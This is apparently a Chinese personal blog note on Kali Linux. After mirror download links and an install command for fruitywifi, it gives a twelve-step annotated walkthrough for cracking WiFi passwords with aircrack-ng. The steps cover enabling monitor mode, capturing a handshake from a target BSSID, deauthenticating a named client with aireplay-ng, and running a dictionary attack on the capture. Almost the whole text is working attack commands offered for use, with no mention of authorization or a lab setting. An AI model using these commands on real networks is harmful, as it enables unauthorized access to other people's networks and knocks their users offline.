MENU

kali系统记录

• March 5, 2020 • Read: 2219 • 折腾阅读设置

https://www.kali.org/

镜像下载:http://old.kali.org/

某大佬推荐使用2018.3版
http://old.kali.org/kali-images/kali-2018.3/

安装fruitywifi
apt-get install fruitywifi -y

通过IP:8000可访问web管理面板。

示例详细步骤及命令:

  1. ifconfig
  2. iwconfig
  3. ifconfig wlan0 down
  4. iwconfig wlan0 mode monitor
  5. ifconfig wlan0 up
  6. iwconfig
  7. airmon-ng start wlan0
  8. airodump-ng mon0
  9. airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0
  10. aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0
  11. aircrack-ng -w /root/Desktop/zidian.txt test-01.cap
1:查看网卡
ifconfig

2:查看网卡工作模式
iwconfig

3:关闭网卡
示例命令:
ifconfig wlan0 down

命令部分注释如下:
ifconfig wlan0(选择网卡) down

4:更改网卡模式为monitor模式
示例命令:
iwconfig wlan0 mode monitor
命令部分注释如下:
iwconfig wlan0(选择网卡) mode monitor

5:启动网卡
示例命令:
ifconfig wlan0 up
命令部分注释如下:
ifconfig wlan0(选择网卡) up

6:查看网卡工作模式
iwconfig

7:启动airmon-ng开启网卡监听模式
示例命令:
airmon-ng start wlan0
命令部分注释如下:
airmon-ng start wlan0(选择网卡)

8:扫描无线网络
airodump-ng mon0

9:开始抓包
示例命令:
airodump-ng -c 11 -w test --bssid EC:26:CA:10:58:62 mon0
命令部分注释如下:
airodump-ng -c 11(选择信道) -w test(自己定义的网络抓包的名字) --bssid EC:26:CA:10:58:62(无线网络MAC地址) mon0

10:发送流量攻击包
aireplay-ng -0 10 -a EC:26:CA:10:58:62 -c A4:DB:30:A4:CF:F5 mon0
命令部分注释如下:
aireplay-ng -0 10 -a EC:26:CA:10:58:62(无线网络MAC地址) -c A4:DB:30:A4:CF:F5(用户MAC地址) mon0

11:若抓包失败,则运行该条命令,从8~10步开始执行(此步骤可不执行)
rm -r test-01.*
命令部分注释如下:
rm -r test(自己定义的网络抓包的名字)-0(为1—9的数字,例如:01、02、03等,自己定义的网络抓包的名字+0.cap 即为握手包名).

12:开始破解WIFI密码
aircrack-ng -w /root/Desktop/zidian.txt test-01.cap
命令部分注释如下:
aircrack-ng -w /root/Desktop/zidian.txt(字典存放的完整路径) test(自己定义的网络抓包的名字)-0(为1—9的数字,按tab键会显示出来,若不出来,则用ls查看已抓到的握手包是哪个).cap(自己定义的网络抓包的名字+0*.cap)

Archives QR Code Tip
QR Code for this page
Tipping QR Code